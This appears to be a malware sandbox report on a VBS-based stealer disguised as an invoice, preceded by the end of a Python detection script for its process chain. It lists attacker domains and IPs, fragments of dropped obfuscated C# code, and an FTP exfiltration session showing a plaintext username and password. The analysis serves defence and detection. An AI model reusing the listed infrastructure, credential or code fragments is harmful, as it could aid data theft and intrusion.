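        parents = ancestry(tree, ev["ppid"])
        parent = parents[0] if parents else None
        if name in SHELLS and parent in SCRIPT_HOSTS:
            out.append(("script_host_spawns_shell", ev["pid"], f"{parent} -> {name}"))
        if name == "csc.exe" and "powershell.exe" in parents \
                and TEMP_OUTPUT.search(ev["cmdline"]):
            out.append(("csc_compiles_into_temp", ev["pid"], ev["cmdline"]))
        if name in DOTNET_UTILITIES and "powershell.exe" in parents:
            out.append(("dotnet_utility_under_powershell", ev["pid"], ev["image"]))
    for ne in net_events:
        if ne["pid"] in tree and _name(tree[ne["pid"]]["image"]) in DOTNET_UTILITIES:
            out.append(("dotnet_utility_connects", ne["pid"],
                        f'{ne["dst_ip"]}:{ne["dst_port"]}'))
    return out


# Copied from the report's dropped csc.exe command line.
CSC_CMDLINE = (
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output '
    r'/R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation'
    r'\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" '
    r'/out:"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll" /debug- /optimize+ '
    r'/warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.0.cs"'
)

# Constructed process-create records mirroring the behaviour graph.
PROC_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": 'wscript.exe "PO-09784893 xlsx.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe <obfuscated very long command line, not reproduced>"},
    {"pid": 310, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": CSC_CMDLINE},
    {"pid": 410, "ppid": 400, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": "cvtres.exe"},
    {"pid": 7836, "ppid": 300, "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe",
     "cmdline": "CasPol.exe"},
]
# Constructed network-connect records for the two peers in the graph.
NET_EVENTS = [
    {"pid": 7836, "dst_ip": "192.185.145.188", "dst_port": 80},  # b3solutionscws.com
    {"pid": 7836, "dst_ip": "185.31.121.136", "dst_port": 21},   # ftp.mcmprint.net
]

if __name__ == "__main__":
    for rule, pid, detail in findings(PROC_EVENTS, NET_EVENTS):
        print(f"{rule:32} pid={pid:<5} {detail}")
```

Each rule on its own is noisy in some environments (developers run csc.exe, admins run PowerShell from scripts); the value is that all three fire on the same ancestry, so correlating on the wscript.exe root PID turns three medium-confidence hits into one high-confidence chain.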

Antivirus detection, initial sample:
Source: PO-09784893 xlsx.vbs | Detection: 2% | Scanner: ReversingLabs
          No Antivirus matches
          No Antivirus matches
Antivirus detection, domains:
Source: ftp.mcmprint.net | Detection: 10% | Scanner: Virustotal

Antivirus detection, URLs (Scanner: Avira URL Cloud):
ftp://ftp.mcmprint.netnoffice | 0% | safe
http://127.0.0.1:HTTP/1.1 | 0% | safe
https://go.micro | 0% | safe
http://b3solutionscws.com/wp-admin/includes/yyXYRRIJkuolPn153.fla | 0% | safe
http://pesterbdd.com/images/Pester.png | 100% | malware
https://contoso.com/ | 0% | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | safe
https://contoso.com/License | 0% | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | safe
https://contoso.com/Icon | 0% | safe
http://OowQOv.com | 0% | safe
http://hWFpSCunbgPMSZDs.net | 0% | safe

Note that the only URL rated "malware" here, http://pesterbdd.com/images/Pester.png, is found in powershell.exe memory next to https://github.com/Pester/Pester: it is the icon URI of the Pester PowerShell module loaded by the host, not a string from the sample, and should not be used as an indicator for this malware. The sample's own infrastructure (b3solutionscws.com, ftp.mcmprint.net) is rated safe by this scanner, which is why the verdict rests on behaviour rather than URL reputation.
Contacted domains:
Name: ftp.mcmprint.net | IP: 185.31.121.136 | Active: true | Malicious: false | Reputation: unknown
Name: b3solutionscws.com | IP: 192.185.145.188 | Active: true | Malicious: false | Reputation: unknown

Contacted URLs:
http://b3solutionscws.com/wp-admin/includes/yyXYRRIJkuolPn153.fla | Malicious: false | Avira URL Cloud: safe | Reputation: unknown

URLs from process memory (Name | Source | Malicious | Antivirus detection | Reputation):
http://127.0.0.1:HTTP/1.1 | CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | false | none | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp | false | none | high
https://go.micro | powershell.exe, 00000005.00000002.2622363726.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
ftp://ftp.mcmprint.netnoffice | CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | false | none | high
https://contoso.com/License | powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://OowQOv.com | CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://hWFpSCunbgPMSZDs.net | CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmp | false | none | high
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp | false | none | high
https://aka.ms/pscore6lBPl | powershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmp | false | none | high

The CasPol.exe memory strings (the Tor Browser download URL, DynDNS/Psi, the ftp.mcmprint.net login fragment and the junk domains OowQOv.com and hWFpSCunbgPMSZDs.net) come from the stealer's own string table; the nuget.org, contoso.com, apache.org and Pester strings in powershell.exe are PowerShell module metadata and are not indicators.
Contacted IPs (IP | Domain | Country | ASN | ASN name | Malicious):
192.185.145.188 | b3solutionscws.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
185.31.121.136 | ftp.mcmprint.net | Bulgaria | 199364 | RAX-ASBG | false
                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:755440
                        Start date and time:2022-11-28 18:44:48 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 49s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:PO-09784893 xlsx.vbs
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                        Run name:Suspected Instruction Hammering
Number of new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                        • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 20.190.159.64, 40.126.31.73, 20.190.159.2, 40.126.31.71, 20.190.159.75, 20.190.159.71, 20.190.159.73, 40.126.31.69
                        • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        No simulations
                        No context
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8003
                        Entropy (8bit):4.841989710132343
                        Encrypted:false
                        SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                        MD5:677C4E3A07935751EA3B092A5E23232F
                        SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                        SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                        SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                        Malicious:false
                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Mon Nov 28 18:47:34 2022, 1st section name ".debug$S"
                        Category:dropped
                        Size (bytes):1332
                        Entropy (8bit):3.9921267078861025
                        Encrypted:false
                        SSDEEP:24:HQzW9Yrrm5gHKwKPfwI+ycuZhNNakSLPNnqS2d:Cri5gBKPo1ulNa3hqSG
                        MD5:2706F0D7F5DABC5A1CC721DBA692F1EB
                        SHA1:CC65CD85D89F680C17DB16BE8E8CB58530E2EF11
                        SHA-256:620588E2053D963D41915EB65D5215C2F00626406C8BEABFDA33BB1EC8552DF8
                        SHA-512:F07612030E995F8E3AD846E2A69FC7C6D9BC189ABC8C07563F91042044E4F9EFE5BE9E91048B87845D43F775863E54FE41FE663C84F529C1A31BE3429785C179
                        Malicious:false
                        Preview:L...F..c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP...................v.5..^h..++..............5.......C:\Users\user\AppData\Local\Temp\RESB964.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.5.h.0.o.c.q.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.0980330764827024
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7YnqqLPN5Dlq5J:+RI+ycuZhNNakSLPNnqX
                        MD5:CF76A035E6CF5E68BABD2B2B1AD6E4C7
                        SHA1:C1514CC6A2B7B4FFBD8F7EEBAD9E480571779443
                        SHA-256:1B0111D7F6316C3A023E61C0D21FF50A1D0FEC547E255F95FFBF1BE1A9112F6F
                        SHA-512:33A8E9C0EF13EC208A763442095D7F7D33790673991B231DB1CD5B356101215B2DCA18F345CD54291E2F528E64427E5E63C3F37A61764A780CF3048B25E88197
                        Malicious:false
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.5.h.0.o.c.q.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.5.h.0.o.c.q.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1330), with no line terminators
                        Category:dropped
                        Size (bytes):1333
                        Entropy (8bit):5.039121039231445
                        Encrypted:false
                        SSDEEP:24:JVS3UwgVcVn1pl65/6f8cwM2sVS86mCVmuWyBeFcwXQ:JVAngyVn1pl65/6EPYpaVmry0FPXQ
                        MD5:5275A510067D1ABB9D22D3925B1C219F
                        SHA1:41B1A3E7A0EE598898BFDC2E5BFDF6A2D34E6D64
                        SHA-256:F44938B9BA94A2465515FD9EA6D319016294EAFA6EDC89A5D2E736195C3FA649
                        SHA-512:B8CC343A3A47116F796D7554DEF206E86DEFEF0379DE0D3EA8870B8655425CD9ADBD08600452313D9D9C7B0483BFCCF1809CB41AB53B36E24D951D6F1F7403DC
                        Malicious:false
                        Preview:.using System;using System.Runtime.InteropServices;public static class Thwartness1 {[DllImport("ADVAPI32.DLL")]public static extern int GetServiceKeyName(int Noyisl,int Slgt69,int Affal,int baga);[DllImport("gdi32")]public static extern int GetClipRgn(int Mul,int Ggegu);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int GlobalDeleteAtom(int Pre151);[DllImport("gdi32")]public static extern int StrokeAndFillPath(int Ethyl87);[DllImport("user32")]public static extern int CloseClipboard();[DllImport("winspool.drv")]public static extern int ScheduleJob(int Unover226,int akti);[DllImport("ADVAPI32.DLL")]public static extern int QueryServiceConfig(int Regler,int Cos0,int Dispos,int Napho27);[DllImport("winspool.drv")]public static extern int DocumentProperties(int Fors,int Langre,int Skriv,int hem,int Sambaf,int Reti);[DllImport("gdi32")]public static extern int PtVisible(int Sat,int Aspa,int Prjsis);[DllImpo
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.256918784888624
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fhMg+zxs7+AEszICN23fhMan:p37Lvkmb6Km5MfWZE75Ma
                        MD5:D434ED867F2BEDFD239B64F88AD3C65A
                        SHA1:1E6F95BCE2D835E04769E0927CF7421589BCAE6C
                        SHA-256:D7682C0718ABFC7CE651D1D5D895036778C92A950C16A93065526AA52B508C27
                        SHA-512:039A3610CAEC83FF4E70E6357F1C7FB0674FB50E54AB879A9CE6A9D8D7F38E018F2BA379D7FCBDA8F4AD5BF4234B385B3E8A4FED7E28808D6328CF33E620B2D0
                        Malicious:true
                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.0.cs"
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):4096
                        Entropy (8bit):3.3137761331931865
                        Encrypted:false
                        SSDEEP:48:6c94JSH+GEZhAdlfdW4DxrIUZQFNYg1ulNa3hq:DeSeHhYVdW0xrIUJfK
                        MD5:CD3E785DA5D5237AA385B4CD2972B654
                        SHA1:BA6615966F40545F716E729813BDC07F1D6A767F
                        SHA-256:5D2C059FED935989F937445329E7925092739DEFD1321AF96DFC48597DB599C6
                        SHA-512:55B8F968D4044D6961C5A0A48E193C8CE3CBBEAD568A60D2D991BDCD968C693729288BB29EFE9F5A70132D0CDE33875FDE97DD7A1D74E51202A60E21F17511A5
                        Malicious:false
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..c...........!.................'... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......P ..t...........................................................BSJB............v4.0.30319......l.......#~..T.......#Strings............#US.........#GUID.......p...#Blob...........G.........%3....................%.......................................3.,...............S.4.................................... :............ L............ W............ j............ {............ ..#.......... ............. ............. ..'.......... ..1.......... ............. ........
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):866
                        Entropy (8bit):5.31878829668306
                        Encrypted:false
                        SSDEEP:12:xKqR37Lvkmb6Km5MfWZE75MTKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Aqd3ka6KmXE7aKax5DqBVKVrdFAMBJTH
                        MD5:598DEDC2D4A52EA0EB3A1B60A9C9598E
                        SHA1:7B6AB880BAB1FD92B78F4EEDE77E7B47E9E7B2E9
                        SHA-256:E1094BEB4B40ABBF826AA1549999F7482D93D3222BE8C13A4424E6F6BFC5C665
                        SHA-512:1E632D8B7A5359AEAAB741EDC7E0BE72EFA66D98CB08F31B0E7155B8EF7BAE39DC090C1EF0B9BDBC8DD4B9B4FE2650A80A9727EA445DBF4D5E86B271F297B50F
                        Malicious:false
                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):30
                        Entropy (8bit):3.964735178725505
                        Encrypted:false
                        SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                        MD5:9F754B47B351EF0FC32527B541420595
                        SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                        SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                        SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                        Malicious:false
                        Preview:NordVPN directory not found!..
                        File type:ASCII text, with CRLF line terminators
                        Entropy (8bit):5.869402783042103
                        TrID:
                          File name:PO-09784893 xlsx.vbs
                          File size:359082
                          MD5:bfa859d9ad7b23d3606ea13f525065a7
                          SHA1:a1b3e395dc20bcdaa866b953a08a48d0079bace2
                          SHA256:ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
                          SHA512:355600deeb50415c614e324248f918e3296a9e5b5cf0c3c89a4a41b4d796c6e556f418895fcd0bd132c38cea753e56d9f731b192e9bbf780f97a95847478017d
                          SSDEEP:6144:JBYNxYY6fG4TOZLzB65IL/IRL5PIQTzW42RcCUsaPw9L3x2I/rjbpHZIKK:7U6+4q5B65dRVPIQMcCUsqQU86KK
                          TLSH:A8748C1CDA2527D7FD1A735AA8D10AC83DED30251F26F769ACED4279F1C21D8873A209
                          File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                          Icon Hash:e8d69ece869a9ec4
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Nov 28, 2022 18:48:07.610390902 CET | 54138 | 53 | 192.168.11.20 | 1.1.1.1
                          Nov 28, 2022 18:48:07.634459972 CET | 53 | 54138 | 1.1.1.1 | 192.168.11.20
                          Nov 28, 2022 18:48:18.758641958 CET | 60447 | 53 | 192.168.11.20 | 1.1.1.1
                          Nov 28, 2022 18:48:18.900638103 CET | 53 | 60447 | 1.1.1.1 | 192.168.11.20
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Nov 28, 2022 18:48:07.610390902 CET | 192.168.11.20 | 1.1.1.1 | 0x240e | Standard query (0) | b3solutionscws.com | A (IP address) | IN (0x0001) | false
                          Nov 28, 2022 18:48:18.758641958 CET | 192.168.11.20 | 1.1.1.1 | 0x51b4 | Standard query (0) | ftp.mcmprint.net | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Nov 28, 2022 18:48:07.634459972 CET | 1.1.1.1 | 192.168.11.20 | 0x240e | No error (0) | b3solutionscws.com | (none) | 192.185.145.188 | A (IP address) | IN (0x0001) | false
                          Nov 28, 2022 18:48:18.900638103 CET | 1.1.1.1 | 192.168.11.20 | 0x51b4 | No error (0) | ftp.mcmprint.net | (none) | 185.31.121.136 | A (IP address) | IN (0x0001) | false
                          • b3solutionscws.com
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                          Nov 28, 2022 18:48:18.973593950 CET | 21 | 49819 | 185.31.121.136 | 192.168.11.20 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                          220-You are user number 1 of 50 allowed.
                          220-Local time is now 19:48. Server port: 21.
                          220-This is a private system - No anonymous login
                          220-IPv6 connections are also welcome on this server.
                          220 You will be disconnected after 15 minutes of inactivity.
                          Nov 28, 2022 18:48:18.973908901 CET | 49819 | 21 | 192.168.11.20 | 185.31.121.136 | USER noffice@mcmprint.net
                          Nov 28, 2022 18:48:19.006086111 CET | 21 | 49819 | 185.31.121.136 | 192.168.11.20 | 331 User noffice@mcmprint.net OK. Password required
                          Nov 28, 2022 18:48:19.006444931 CET | 49819 | 21 | 192.168.11.20 | 185.31.121.136 | PASS 2K-0}h.[5hb)
                          Nov 28, 2022 18:48:22.121335983 CET | 21 | 49819 | 185.31.121.136 | 192.168.11.20 | 530 Login authentication failed
                          Nov 28, 2022 18:48:22.158265114 CET | 21 | 49819 | 185.31.121.136 | 192.168.11.20 | 530 Logout.


                          Target ID:0
                          Start time:18:46:42
                          Start date:28/11/2022
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
                          Imagebase:0x7ff688f30000
                          File size:170496 bytes
                          MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:2
                          Start time:18:46:43
                          Start date:28/11/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:CMD.EXE /c echo C:\Windows
                          Imagebase:0x7ff66adc0000
                          File size:289792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:3
                          Start time:18:46:43
                          Start date:28/11/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6297d0000
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:5
                          Start time:18:47:03
                          Start date:28/11/2022
